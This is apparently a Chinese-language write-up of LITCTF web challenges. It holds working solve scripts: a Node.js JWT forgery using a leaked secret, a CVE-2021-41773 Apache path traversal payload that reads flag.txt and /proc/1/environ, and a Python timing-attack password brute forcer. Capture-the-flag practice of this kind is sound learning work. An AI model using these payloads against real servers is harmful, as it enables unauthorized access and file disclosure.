目录
anti-inspect
因为一直while true,网页会卡死无法访问
const flag = "LITCTF{your_%cfOund_teh_fI@g_94932}";
console.log(
flag,
"background-color: darkblue; color: white; font-style: italic; border: 5px solid hotpink; font-size: 2em;"
);
直接console里打印出flag,注意谷歌浏览器不行,这里我用的是火狐
jwt-1
注册改jwt
爆密钥
改jwt拿flag
jwt-2
直接给了源码,泄露了密钥
附件是ts写的,破解脚本也拿ts写就是
exp:
const crypto = require('crypto');
const axios = require('axios');
const url = 'http://litctf.org:31777/flag';
const jwtSecret = 'xook';
// JWT header
const header = Buffer.from(JSON.stringify({ alg: 'HS256', typ: 'JWT' }), 'utf8')
.toString('base64')
.replace(/=/g, '');
// 伪造的JWT payload
const payload = Buffer.from(JSON.stringify({ name: 'aad', admin: true }), 'utf8')
.toString('base64')
.replace(/=/g, '');
// 生成伪造的JWT签名
const data = `${header}.${payload}`;
const signature = crypto.createHmac('sha256', jwtSecret)
.update(data)
.digest('base64')
.replace(/=/g, '');
// 生成伪造的JWT token
const forgedToken = `${data}.${signature}`;
// 设置cookie并发送请求
axios.get(url, { headers: { Cookie: `token=${forgedToken}` } })
.then(response => {
console.log(response.data);
})
.catch(error => {
if (error.response) {
console.error(error.response.data);
} else {
console.error(error.message);
}
});
traversed
dirsearch扫出来信息泄露
打的是CVE-2021-41773任意文件读取Apache HTTP Server路径穿越漏洞(CVE-2021-41773、CVE-2021-42013)复现 | chaser's Blog
读当前目录下flag.txt即可
/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/proc/self/cwd/flag.txt
或者先读环境变量/proc/1/environ得知pwd为/app
再读/app/flag.txt
kirbytime
写脚本暴力破解密码
py脚本
import requests
import string
import time
# 目标 URL
url = 'http://34.31.154.223:50350/' # 修改为实际的 URL
# 扩展字符集(包括小写字母、大写字母、数字和常见特殊符号)
charset = string.ascii_letters + string.digits + "!@#$%^&*()-=_+[]{}|;:,.<>/?~"
# 密码长度
password_length = 7
# 初始猜测密码
known_password = ['a'] * password_length # 初始密码设为 'aaaaaaa'
def check_password(password):
"""检查密码并返回响应时间"""
start_time = time.time()
response = requests.post(url, data={'password': password})
end_time = time.time()
response_time = end_time - start_time
print(f"Trying password: {password}, Response Time: {response_time:.2f}s")
return response_time
def find_password():
for pos in range(password_length):
print(f"Finding character for position {pos}...")
for char in charset:
# 尝试将当前位置设置为当前字符
known_password[pos] = char
current_guess = ''.join(known_password)
response_time = check_password(current_guess)
# 动态计算阈值,根据字符位置动态设置
threshold = 1.2 + pos * 1.0 # 例:阈值动态增加,可根据实际情况调整
print(f"Response Time for {char} at position {pos}: {response_time:.2f}s, Threshold: {threshold:.2f}s")
if response_time > threshold:
print(f"Character at position {pos} fixed as: {char}")
break
else:
# 如果没有找到合适的字符,重置当前位置并尝试其他字符
known_password[pos] = 'a'
print(f"Failed to fix character at position {pos}")
print(f"Known password so far: {''.join(known_password)}")
return ''.join(known_password)
# 开始破解
if __name__ == '__main__':
start_time = time.time()
found_password = find_password()
end_time = time.time()
elapsed_time = end_time - start_time
if found_password:
print(f"Final password: {found_password}")
print(f"Time taken: {elapsed_time:.2f} seconds")
# 使用找到的密码进行登录
response = requests.post(url, data={'password': found_password})
if response.status_code == 200:
print("Login successful!")
print("Response from server:")
print(response.text)
else:
print("Login failed.")
else:
print("Password not found.")
爆出来密码是kBySlaY
直接LITCTF{}包裹密码就是flag
scrainbow
纯脚本题,写脚本通了游戏即可
import requests
headers = {
'Accept': '*/*',
'Accept-Language': 'zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6',
'Connection': 'keep-alive',
'Referer': 'http://litctf.org:31780/',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0'
}
data = requests.get('http://litctf.org:31780/data', headers=headers, verify=False).json()
def rgb2hsl(hex: str) -> tuple[float, float, float]:
hex = hex.lstrip('#')
r, g, b = int(hex[:2], 16), int(hex[2:4], 16), int(hex[4:], 16)
r, g, b = r / 255.0, g / 255.0, b / 255.0
mx = max(r, g, b)
mn = min(r, g, b)
df = mx-mn
if mx == mn:
h = 0
elif mx == r:
h = (60 * ((g-b)/df) + 360) % 360
elif mx == g:
h = (60 * ((b-r)/df) + 120) % 360
elif mx == b:
h = (60 * ((r-g)/df) + 240) % 360
if mx == 0:
s = 0
else:
s = df/mx
l = (mx+mn)/2
return h, s, l
colors_map: dict[float, list[int]] = {}
for i, color in enumerate(data):
h, s, l = rgb2hsl(color)
if h not in colors_map:
colors_map[h] = []
colors_map[h].append(i)
colors = [p for h, p in sorted(colors_map.items(), key=lambda x: x[0], reverse=False)]
target = []
for i in range(100):
for j in range(100):
target.append(colors[i+j].pop())
# for i in range(len(data)):
# print(f"data[{i}] = '{data[target[i]]}';")
# exit()
moves = []
current = [i for i in range(len(data))]
for i in range(len(target)):
if current[i] == target[i]:
continue
a, b = i, current.index(target[i])
moves.append((a, b))
current[a], current[b] = current[b], current[a]
# for move in moves:
# print(f"temp = data[{move[0]}]; data[{move[0]}] = data[{move[1]}]; data[{move[1]}] = temp;")
response = requests.post('http://litctf.org:31780/test', headers=headers, json={'data': moves}, verify=False)
print(response.text)